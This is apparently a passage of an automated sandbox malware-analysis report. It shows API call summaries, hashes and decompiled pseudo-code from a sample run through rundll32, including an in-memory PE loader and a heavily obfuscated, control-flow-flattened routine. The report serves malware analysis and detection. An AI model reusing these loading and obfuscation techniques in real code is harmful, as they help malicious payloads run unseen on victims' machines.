                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                    • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                    • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
                                                                                                                    • _malloc.LIBCMT ref: 100127F5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                    • String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
                                                                                                                    • API String ID: 572389289-2839844625
                                                                                                                    • Opcode ID: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                    • Instruction ID: 8f66a7c676ce8d0fa2ca8bd8519024a549b55f77dd79b918ae70bd0eec3b217e
                                                                                                                    • Opcode Fuzzy Hash: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                    • Instruction Fuzzy Hash: FB613EB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10002280 Relevance: 22.8, APIs: 15, Instructions: 331COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 36 10002280-100022a7 call 10001990 39 100022b0-100022c1 36->39 40 100022a9-100022ab 36->40 42 100022c3-100022d0 SetLastError 39->42 43 100022d5-100022f0 call 10001990 39->43 41 1000269a-1000269d 40->41 42->41 46 100022f2-100022f4 43->46 47 100022f9-1000230e 43->47 46->41 48 10002310-1000231d SetLastError 47->48 49 10002322-1000232f 47->49 48->41 50 10002331-1000233e SetLastError 49->50 51 10002343-1000234c 49->51 50->41 52 10002360-10002381 51->52 53 1000234e-1000235b SetLastError 51->53 54 10002395-1000239f 52->54 53->41 55 100023a1-100023a8 54->55 56 100023d7-10002412 GetNativeSystemInfo 54->56 57 100023b8-100023c4 55->57 58 100023aa-100023b6 55->58 59 10002414-10002421 SetLastError 56->59 60 10002426-10002445 VirtualAlloc 56->60 61 100023c7-100023cd 57->61 58->61 59->41 62 10002472-1000248a GetProcessHeap HeapAlloc 60->62 63 10002447-10002461 VirtualAlloc 60->63 64 100023d5 61->64 65 100023cf-100023d2 61->65 67 100024ac-10002510 call 10001990 62->67 68 1000248c-100024a7 VirtualFree SetLastError 62->68 63->62 66 10002463-1000246d SetLastError 63->66 64->54 65->64 66->41 72 10002512 67->72 73 1000251c-10002581 VirtualAlloc call 10001810 call 100019c0 67->73 68->41 74 1000268c-10002698 call 10002840 72->74 81 10002583 73->81 82 1000258d-1000259e 73->82 74->41 81->74 83 100025a0-100025b6 call 10001eb0 82->83 84 100025b8-100025bb 82->84 86 100025c2-100025d0 call 10001ff0 83->86 84->86 90 100025d2 86->90 91 100025dc-100025ea call 10001cb0 86->91 90->74 94 100025f6-10002604 call 10001e30 91->94 95 100025ec 91->95 98 10002606 94->98 99 1000260d-10002616 94->99 95->74 98->74 100 10002618-1000261f 99->100 101 1000267d-10002680 99->101 103 10002621-10002643 call 33e991 100->103 104 1000266a-10002678 100->104 102 10002687-1000268a 101->102 102->41 106 10002646-1000264d 103->106 105 1000267b 104->105 105->102 107 1000265e-10002668 106->107 108 1000264f-1000265a SetLastError 106->108 107->105 108->74
                                                                                                                    C-Code - Quality: 89%
                                                                                                                    			E10002280(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v8;
				void* _v12;
				signed short* _v16;
				void* _v20;
				void* _v24;
				long _v28;
				signed int _v32;
				intOrPtr _v64;
				char _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr* _v80;
				intOrPtr _v84;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* _t180;
				void* _t191;
				void* _t198;
				void* _t202;
				intOrPtr _t209;
				void* _t220;
				intOrPtr _t269;
				intOrPtr _t278;
				intOrPtr _t326;

				_v100 = __ecx;
				_v72 = 0;
				_v20 = 0;
				if(E10001990(_v100, _a8, 0x40) != 0) {
					_v16 = _a4;
					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
						_t10 =  &(_v16[0x1e]); // 0xfffefe57
						if(E10001990(_v100, _a8,  *_t10 + 0xf8) != 0) {
							_t15 =  &(_v16[0x1e]); // 0xfffefe57
							_v80 = _a4 +  *_t15;
							if( *_v80 == 0x4550) {
								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
										_v32 =  *(_v80 + 0x38);
										_v12 = 0;
										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
											} else {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
											}
											if(_v88 > _v20) {
												_v20 = _v88;
											}
											_v12 = _v12 + 1;
											_v84 = _v84 + 0x28;
										}
										__imp__GetNativeSystemInfo( &_v68); // executed
										_t59 = _v64 - 1; // 0x71
										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _t59 &  !(_v64 - 1);
										_t65 = _v64 - 1; // -1
										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
											_t180 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
											_v24 = _t180;
											if(_v24 != 0) {
												L26:
												_v72 = HeapAlloc(GetProcessHeap(), 8, 0x34);
												if(_v72 != 0) {
													 *((intOrPtr*)(_v72 + 4)) = _v24;
													asm("sbb edx, edx");
													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
													if(E10001990(_v100, _a8,  *(_v80 + 0x54)) != 0) {
														_t191 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
														_v8 = _t191;
														E10001810(_v8, _v16,  *(_v80 + 0x54));
														_t115 =  &(_v16[0x1e]); // 0xfffefe57
														 *_v72 = _v8 +  *_t115;
														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
														_t198 = E100019C0(_v100, _a4, _a8, _v80, _v72); // executed
														if(_t198 != 0) {
															_t269 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
															_v76 = _t269;
															if(_t269 == 0) {
																 *((intOrPtr*)(_v72 + 0x18)) = 1;
															} else {
																 *((intOrPtr*)(_v72 + 0x18)) = E10001EB0(_v100, _v72, _v76);
															}
															if(E10001FF0(_v100, _v72) != 0) {
																_t202 = E10001CB0(_v100, _v72); // executed
																if(_t202 != 0) {
																	if(E10001E30(_v100, _v72) != 0) {
																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
																			 *(_v72 + 0x2c) = 0;
																			L49:
																			return _v72;
																		}
																		if( *(_v72 + 0x14) == 0) {
																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																			L47:
																			goto L49;
																		}
																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																		_t209 =  *0x10055a88; // 0x0
																		_t278 =  *0x10055a84; // 0x1
																		_t326 =  *0x10055a80; // 0x10000000
																		_v92 = _v96(_t326, _t278, _t209);
																		if(_v92 != 0) {
																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
																			goto L47;
																		}
																		SetLastError(0x45a);
																		L50:
																		E10002840(_v100, _v72);
																		return 0;
																	}
																	goto L50;
																}
																goto L50;
															}
															goto L50;
														}
														goto L50;
													}
													goto L50;
												}
												VirtualFree(_v24, 0, 0x8000);
												SetLastError(0xe);
												return 0;
											}
											_t220 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
											_v24 = _t220;
											if(_v24 != 0) {
												goto L26;
											}
											SetLastError(0xe);
											return 0;
										}
										SetLastError(0xc1);
										return 0;
									}
									SetLastError(0xc1);
									return 0;
								}
								SetLastError(0xc1);
								return 0;
							}
							SetLastError(0xc1);
							return 0;
						}
						return 0;
					}
					SetLastError(0xc1);
					return 0;
				}
				return 0;
			}





























                                                                                                                    0x10002286
                                                                                                                    0x10002289
                                                                                                                    0x10002290
                                                                                                                    0x100022a7
                                                                                                                    0x100022b3
                                                                                                                    0x100022c1
                                                                                                                    0x100022d8
                                                                                                                    0x100022f0
                                                                                                                    0x100022ff
                                                                                                                    0x10002302
                                                                                                                    0x1000230e
                                                                                                                    0x1000232f
                                                                                                                    0x1000234c
                                                                                                                    0x1000236e
                                                                                                                    0x10002377
                                                                                                                    0x1000237a
                                                                                                                    0x10002395
                                                                                                                    0x100023a8
                                                                                                                    0x100023c4
                                                                                                                    0x100023aa
                                                                                                                    0x100023b3
                                                                                                                    0x100023b3
                                                                                                                    0x100023cd
                                                                                                                    0x100023d2
                                                                                                                    0x100023d2
                                                                                                                    0x10002389
                                                                                                                    0x10002392
                                                                                                                    0x10002392
                                                                                                                    0x100023db
                                                                                                                    0x100023ea
                                                                                                                    0x100023f8
                                                                                                                    0x10002401
                                                                                                                    0x10002412
                                                                                                                    0x10002438
                                                                                                                    0x1000243e
                                                                                                                    0x10002445
                                                                                                                    0x10002472
                                                                                                                    0x10002483
                                                                                                                    0x1000248a
                                                                                                                    0x100024b2
                                                                                                                    0x100024c4
                                                                                                                    0x100024cb
                                                                                                                    0x100024d4
                                                                                                                    0x100024dd
                                                                                                                    0x100024e6
                                                                                                                    0x100024ef
                                                                                                                    0x100024f8
                                                                                                                    0x10002510
                                                                                                                    0x1000252e
                                                                                                                    0x10002534
                                                                                                                    0x10002546
                                                                                                                    0x10002554
                                                                                                                    0x1000255a
                                                                                                                    0x10002564
                                                                                                                    0x1000257a
                                                                                                                    0x10002581
                                                                                                                    0x10002598
                                                                                                                    0x1000259b
                                                                                                                    0x1000259e
                                                                                                                    0x100025bb
                                                                                                                    0x100025a0
                                                                                                                    0x100025b3
                                                                                                                    0x100025b3
                                                                                                                    0x100025d0
                                                                                                                    0x100025e3
                                                                                                                    0x100025ea
                                                                                                                    0x10002604
                                                                                                                    0x10002616
                                                                                                                    0x10002680
                                                                                                                    0x10002687
                                                                                                                    0x00000000
                                                                                                                    0x10002687
                                                                                                                    0x1000261f
                                                                                                                    0x10002678
                                                                                                                    0x1000267b
                                                                                                                    0x00000000
                                                                                                                    0x1000267b
                                                                                                                    0x1000262c
                                                                                                                    0x1000262f
                                                                                                                    0x10002635
                                                                                                                    0x1000263c
                                                                                                                    0x10002646
                                                                                                                    0x1000264d
                                                                                                                    0x10002661
                                                                                                                    0x00000000
                                                                                                                    0x10002661
                                                                                                                    0x10002654
                                                                                                                    0x1000268c
                                                                                                                    0x10002693
                                                                                                                    0x00000000
                                                                                                                    0x10002698
                                                                                                                    0x00000000
                                                                                                                    0x10002606
                                                                                                                    0x00000000
                                                                                                                    0x100025ec
                                                                                                                    0x00000000
                                                                                                                    0x100025d2
                                                                                                                    0x00000000
                                                                                                                    0x10002583
                                                                                                                    0x00000000
                                                                                                                    0x10002512
                                                                                                                    0x10002497
                                                                                                                    0x1000249f
                                                                                                                    0x00000000
                                                                                                                    0x100024a5
                                                                                                                    0x10002454
                                                                                                                    0x1000245a
                                                                                                                    0x10002461
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10002465
                                                                                                                    0x00000000
                                                                                                                    0x1000246b
                                                                                                                    0x10002419
                                                                                                                    0x00000000
                                                                                                                    0x1000241f
                                                                                                                    0x10002353
                                                                                                                    0x00000000
                                                                                                                    0x10002359
                                                                                                                    0x10002336
                                                                                                                    0x00000000
                                                                                                                    0x1000233c
                                                                                                                    0x10002315
                                                                                                                    0x00000000
                                                                                                                    0x1000231b
                                                                                                                    0x00000000
                                                                                                                    0x100022f2
                                                                                                                    0x100022c8
                                                                                                                    0x00000000
                                                                                                                    0x100022ce
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                    • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1452528299-0
                                                                                                                    • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                    • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                    • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                    • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0033F8FD Relevance: 11.6, Strings: 9, Instructions: 353COMMONCrypto
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 148 33f8fd-33fddc 149 33fde0-33fde6 148->149 150 33ffa3-33ffbe call 334b61 149->150 151 33fdec-33fdf2 149->151 161 33ffc3-33ffc9 150->161 152 33ffd1-33ffe9 call 33ab87 151->152 153 33fdf8-33fdfe 151->153 162 33ffee-33fff3 152->162 155 33fe04-33fe0a 153->155 156 33ff5e-33ff64 153->156 159 33fe10-33fe16 155->159 160 33ff49-33ff59 call 33f899 155->160 163 33ff66-33ff6a 156->163 164 33ff99-33ff9e 156->164 165 33fe18-33fe1e 159->165 166 33fe8f-33feae call 3446bb 159->166 160->149 161->149 167 33ffcf 161->167 169 33fff4-340000 162->169 170 33ff91-33ff97 163->170 171 33ff6c-33ff73 163->171 164->149 165->161 172 33fe24-33fe5e call 34dcf7 call 33b23c 165->172 179 33feb3-33ff44 call 34da22 call 34dcf7 call 3347ce call 33a8b0 166->179 167->169 170->163 170->164 175 33ff81-33ff8a 171->175 186 33fe63-33fe8a call 33a8b0 172->186 176 33ff75-33ff79 175->176 177 33ff8c-33ff8e 175->177 176->177 182 33ff7b-33ff7e 176->182 177->170 179->149 182->175 186->161
                                                                                                                    C-Code - Quality: 80%
                                                                                                                    			E0033F8FD() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed short* _t368;
				signed int _t381;
				signed int* _t383;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t405;
				signed int* _t438;
				void* _t439;
				signed short* _t445;
				signed int* _t446;

				_t446 =  &_v1700;
				_v1636 = 0x636551;
				_t2 =  &_v1636; // 0x636551
				_t385 = 0x5e;
				_v1636 =  *_t2 / _t385;
				_t383 = 0;
				_t386 = 0x7a;
				_t439 = 0x12dab9f;
				_v1636 = _v1636 * 0x55;
				_v1636 = _v1636 ^ 0x0059e0ec;
				_v1616 = 0x84ec4b;
				_v1616 = _v1616 + 0xffff958e;
				_v1616 = _v1616 << 6;
				_v1616 = _v1616 ^ 0x212f9cfc;
				_v1624 = 0x57c2af;
				_v1624 = _v1624 / _t386;
				_v1624 = _v1624 >> 0xa;
				_v1624 = _v1624 ^ 0x000a9340;
				_v1676 = 0x94d6a3;
				_v1676 = _v1676 >> 3;
				_t387 = 0x41;
				_v1676 = _v1676 * 0x79;
				_v1676 = _v1676 * 0x68;
				_v1676 = _v1676 ^ 0x9280c2f7;
				_v1644 = 0x578290;
				_v1644 = _v1644 | 0x80e552f7;
				_v1644 = _v1644 + 0xffffd80b;
				_v1644 = _v1644 ^ 0x80feae5e;
				_v1652 = 0x70c956;
				_v1652 = _v1652 ^ 0x31ba76f8;
				_v1652 = _v1652 ^ 0x87f2510e;
				_v1652 = _v1652 ^ 0xb63594c0;
				_v1696 = 0x39dcdb;
				_v1696 = _v1696 * 0x22;
				_v1696 = _v1696 >> 0xf;
				_v1696 = _v1696 * 0x75;
				_v1696 = _v1696 ^ 0x000247c6;
				_v1572 = 0x793846;
				_v1572 = _v1572 + 0xfc60;
				_v1572 = _v1572 ^ 0x007fa213;
				_v1576 = 0x3629f6;
				_v1576 = _v1576 | 0x7f6cc17b;
				_v1576 = _v1576 ^ 0x7f7c74a2;
				_v1600 = 0x630dc0;
				_v1600 = _v1600 | 0x8a3170d6;
				_v1600 = _v1600 ^ 0x8a7fe201;
				_v1664 = 0xe79625;
				_v1664 = _v1664 * 0x57;
				_v1664 = _v1664 ^ 0xe47ae09a;
				_v1664 = _v1664 + 0xffff598f;
				_v1664 = _v1664 ^ 0xaac0e7d1;
				_v1648 = 0xac147c;
				_v1648 = _v1648 << 4;
				_v1648 = _v1648 / _t387;
				_v1648 = _v1648 ^ 0x00264750;
				_v1588 = 0x745952;
				_t98 =  &_v1588; // 0x745952
				_v1588 =  *_t98 * 0x3a;
				_v1588 = _v1588 ^ 0x1a53f4d8;
				_v1672 = 0x57a21b;
				_t388 = 0x49;
				_v1672 = _v1672 / _t388;
				_t389 = 0x63;
				_v1672 = _v1672 / _t389;
				_v1672 = _v1672 | 0xd6f4ed27;
				_v1672 = _v1672 ^ 0xd6feee0f;
				_v1620 = 0xc904e8;
				_t390 = 0x17;
				_v1620 = _v1620 * 0x6d;
				_v1620 = _v1620 + 0x178d;
				_v1620 = _v1620 ^ 0x5592dda0;
				_v1688 = 0x59d198;
				_v1688 = _v1688 | 0x5938a823;
				_v1688 = _v1688 ^ 0x788d0eee;
				_v1688 = _v1688 + 0xffff1978;
				_v1688 = _v1688 ^ 0x21fe2fab;
				_v1612 = 0xa097a2;
				_v1612 = _v1612 << 9;
				_v1612 = _v1612 / _t390;
				_v1612 = _v1612 ^ 0x02dc2d90;
				_v1700 = 0xb7b4a0;
				_t391 = 0x36;
				_v1700 = _v1700 / _t391;
				_v1700 = _v1700 >> 1;
				_v1700 = _v1700 | 0xee164e4b;
				_v1700 = _v1700 ^ 0xee1e6de5;
				_v1680 = 0xe4ad14;
				_v1680 = _v1680 | 0xe839ddc8;
				_v1680 = _v1680 ^ 0xfe881b96;
				_t392 = 0x42;
				_v1680 = _v1680 * 0x4e;
				_v1680 = _v1680 ^ 0xd7ed2c6e;
				_v1656 = 0xa710a4;
				_v1656 = _v1656 + 0xfffff8f1;
				_v1656 = _v1656 ^ 0xcc5b21c1;
				_v1656 = _v1656 ^ 0xccf98fb8;
				_v1628 = 0x5fc40d;
				_v1628 = _v1628 + 0xb682;
				_v1628 = _v1628 << 6;
				_v1628 = _v1628 ^ 0x181c8c04;
				_v1640 = 0xd7aa78;
				_v1640 = _v1640 + 0x8e1d;
				_v1640 = _v1640 / _t392;
				_v1640 = _v1640 ^ 0x0007a72a;
				_v1580 = 0xbf48f6;
				_t393 = 0x25;
				_v1580 = _v1580 * 0xd;
				_v1580 = _v1580 ^ 0x09b7b49e;
				_v1564 = 0xff195;
				_v1564 = _v1564 + 0x8c1b;
				_v1564 = _v1564 ^ 0x00104e06;
				_v1684 = 0xbf1e83;
				_v1684 = _v1684 / _t393;
				_t394 = 0x77;
				_v1684 = _v1684 / _t394;
				_v1684 = _v1684 + 0xa662;
				_v1684 = _v1684 ^ 0x0006fc0d;
				_v1596 = 0xc39bae;
				_v1596 = _v1596 << 2;
				_v1596 = _v1596 ^ 0x030cfbaf;
				_v1568 = 0x66568e;
				_v1568 = _v1568 | 0x44ac0d6e;
				_v1568 = _v1568 ^ 0x44e9cf2b;
				_v1692 = 0x3d2b27;
				_v1692 = _v1692 + 0x3fae;
				_t395 = 0x71;
				_v1692 = _v1692 / _t395;
				_v1692 = _v1692 + 0xffff1a11;
				_v1692 = _v1692 ^ 0xffffbf57;
				_v1632 = 0xb4dfda;
				_v1632 = _v1632 * 9;
				_v1632 = _v1632 >> 3;
				_v1632 = _v1632 ^ 0x00c4553b;
				_v1584 = 0x206e7a;
				_v1584 = _v1584 << 7;
				_v1584 = _v1584 ^ 0x10371375;
				_v1592 = 0x689459;
				_v1592 = _v1592 + 0xffffb773;
				_v1592 = _v1592 ^ 0x00637077;
				_v1660 = 0x8b14df;
				_v1660 = _v1660 << 0xd;
				_v1660 = _v1660 + 0x9803;
				_v1660 = _v1660 << 0xa;
				_v1660 = _v1660 ^ 0x71eeeb6f;
				_v1608 = 0x8e767e;
				_v1608 = _v1608 | 0xfaf7fbb6;
				_v1608 = _v1608 ^ 0xfaf9bdf5;
				_v1668 = 0xccd677;
				_v1668 = _v1668 * 0x78;
				_v1668 = _v1668 + 0xffff6b3d;
				_v1668 = _v1668 + 0xf0ff;
				_v1668 = _v1668 ^ 0x600a3b9e;
				_v1604 = 0x7c05f9;
				_v1604 = _v1604 + 0xd55a;
				_v1604 = _v1604 ^ 0x007aedaa;
				_t445 = _v1604;
				while(_t439 != 0x12dab9f) {
					if(_t439 == 0x2f8e73a) {
						_push(_v1604);
						_push(_t383);
						_push(_t395);
						_push(_t383);
						_push(_t383);
						_push(_v1668);
						_push(_t445);
						E0033AB87(_v1660, _v1608, __eflags);
						_t383 = 1;
						__eflags = 1;
						L23:
						return _t383;
					}
					if(_t439 == 0x92208ae) {
						_t368 = _t445;
						__eflags =  *_t445 - _t383;
						if(__eflags == 0) {
							L18:
							_t439 = 0xeef82b0;
							continue;
						} else {
							goto L11;
						}
						do {
							L11:
							__eflags =  *_t368 - 0x2c;
							if( *_t368 != 0x2c) {
								goto L17;
							}
							_t438 =  &_v1560;
							while(1) {
								_t368 =  &(_t368[1]);
								_t405 =  *_t368 & 0x0000ffff;
								__eflags = _t405;
								if(_t405 == 0) {
									break;
								}
								__eflags = _t405 - 0x20;
								if(_t405 == 0x20) {
									break;
								}
								 *_t438 = _t405;
								_t438 =  &(_t438[0]);
								__eflags = _t438;
							}
							_t395 = 0;
							__eflags = 0;
							 *_t438 = 0;
							L17:
							_t368 =  &(_t368[1]);
							__eflags =  *_t368 - _t383;
						} while (__eflags != 0);
						goto L18;
					}
					if(_t439 == 0x99a67ee) {
						_t445 = E0033F899(_t395);
						_t439 = 0x92208ae;
						continue;
					}
					if(_t439 == 0x9e65a83) {
						_push(_v1612);
						_push(_v1636);
						_push(_v1688);
						_push( &_v520); // executed
						E003446BB(_v1672, _v1620); // executed
						E0034DA22(_v1700, _v1680, __eflags, _v1656,  &_v1040, _v1672, _v1628);
						_push(_v1564);
						_push(_v1580);
						E003347CE( &_v520, _v1684, _v1640, _v1596, _v1568, E0034DCF7(_v1640, 0x331140, __eflags),  &_v1040, _v1692, _v1632);
						_t395 = _v1584;
						E0033A8B0(_t395, _t375, _v1592);
						_t446 = _t446 - 0xc + 0x58;
						_t439 = 0x2f8e73a;
						continue;
					}
					_t457 = _t439 - 0xeef82b0;
					if(_t439 == 0xeef82b0) {
						_push(_v1696);
						_push(_v1652);
						_t381 = E0033B23C(_v1572, _v1576, E0034DCF7(_v1644, 0x3310c0, _t457), _v1600, _v1664,  &_v1560); // executed
						_t395 = _v1648;
						asm("sbb edi, edi");
						_t439 = ( ~_t381 & 0xfbf501ac) + 0xdf158d7;
						E0033A8B0(_t395, _t379, _v1588);
						_t446 =  &(_t446[7]);
					}
					L20:
					if(_t439 != 0xdf158d7) {
						continue;
					}
					goto L23;
				}
				E00334B61( &_v1560, 0x208, _v1616, _v1624);
				_pop(_t395);
				_t439 = 0x99a67ee;
				goto L20;
			}




























































                                                                                                                    0x0033f8fd
                                                                                                                    0x0033f903
                                                                                                                    0x0033f90d
                                                                                                                    0x0033f917
                                                                                                                    0x0033f91c
                                                                                                                    0x0033f927
                                                                                                                    0x0033f929
                                                                                                                    0x0033f92c
                                                                                                                    0x0033f931
                                                                                                                    0x0033f935
                                                                                                                    0x0033f93d
                                                                                                                    0x0033f945
                                                                                                                    0x0033f94d
                                                                                                                    0x0033f952
                                                                                                                    0x0033f95a
                                                                                                                    0x0033f96a
                                                                                                                    0x0033f96e
                                                                                                                    0x0033f973
                                                                                                                    0x0033f97b
                                                                                                                    0x0033f983
                                                                                                                    0x0033f98d
                                                                                                                    0x0033f98e
                                                                                                                    0x0033f997
                                                                                                                    0x0033f99b
                                                                                                                    0x0033f9a3
                                                                                                                    0x0033f9ab
                                                                                                                    0x0033f9b3
                                                                                                                    0x0033f9bb
                                                                                                                    0x0033f9c3
                                                                                                                    0x0033f9cb
                                                                                                                    0x0033f9d3
                                                                                                                    0x0033f9db
                                                                                                                    0x0033f9e3
                                                                                                                    0x0033f9f0
                                                                                                                    0x0033f9f4
                                                                                                                    0x0033f9fe
                                                                                                                    0x0033fa02
                                                                                                                    0x0033fa0a
                                                                                                                    0x0033fa15
                                                                                                                    0x0033fa20
                                                                                                                    0x0033fa2b
                                                                                                                    0x0033fa36
                                                                                                                    0x0033fa41
                                                                                                                    0x0033fa4c
                                                                                                                    0x0033fa54
                                                                                                                    0x0033fa5c
                                                                                                                    0x0033fa64
                                                                                                                    0x0033fa71
                                                                                                                    0x0033fa75
                                                                                                                    0x0033fa7d
                                                                                                                    0x0033fa85
                                                                                                                    0x0033fa8d
                                                                                                                    0x0033fa95
                                                                                                                    0x0033faa0
                                                                                                                    0x0033faa4
                                                                                                                    0x0033faac
                                                                                                                    0x0033fab7
                                                                                                                    0x0033fabf
                                                                                                                    0x0033fac6
                                                                                                                    0x0033fad1
                                                                                                                    0x0033fae1
                                                                                                                    0x0033fae6
                                                                                                                    0x0033faf0
                                                                                                                    0x0033faf5
                                                                                                                    0x0033fafb
                                                                                                                    0x0033fb03
                                                                                                                    0x0033fb0b
                                                                                                                    0x0033fb18
                                                                                                                    0x0033fb1b
                                                                                                                    0x0033fb1f
                                                                                                                    0x0033fb27
                                                                                                                    0x0033fb2f
                                                                                                                    0x0033fb37
                                                                                                                    0x0033fb3f
                                                                                                                    0x0033fb47
                                                                                                                    0x0033fb4f
                                                                                                                    0x0033fb57
                                                                                                                    0x0033fb5f
                                                                                                                    0x0033fb6c
                                                                                                                    0x0033fb70
                                                                                                                    0x0033fb78
                                                                                                                    0x0033fb84
                                                                                                                    0x0033fb89
                                                                                                                    0x0033fb8f
                                                                                                                    0x0033fb93
                                                                                                                    0x0033fb9b
                                                                                                                    0x0033fba3
                                                                                                                    0x0033fbab
                                                                                                                    0x0033fbb3
                                                                                                                    0x0033fbc0
                                                                                                                    0x0033fbc3
                                                                                                                    0x0033fbc7
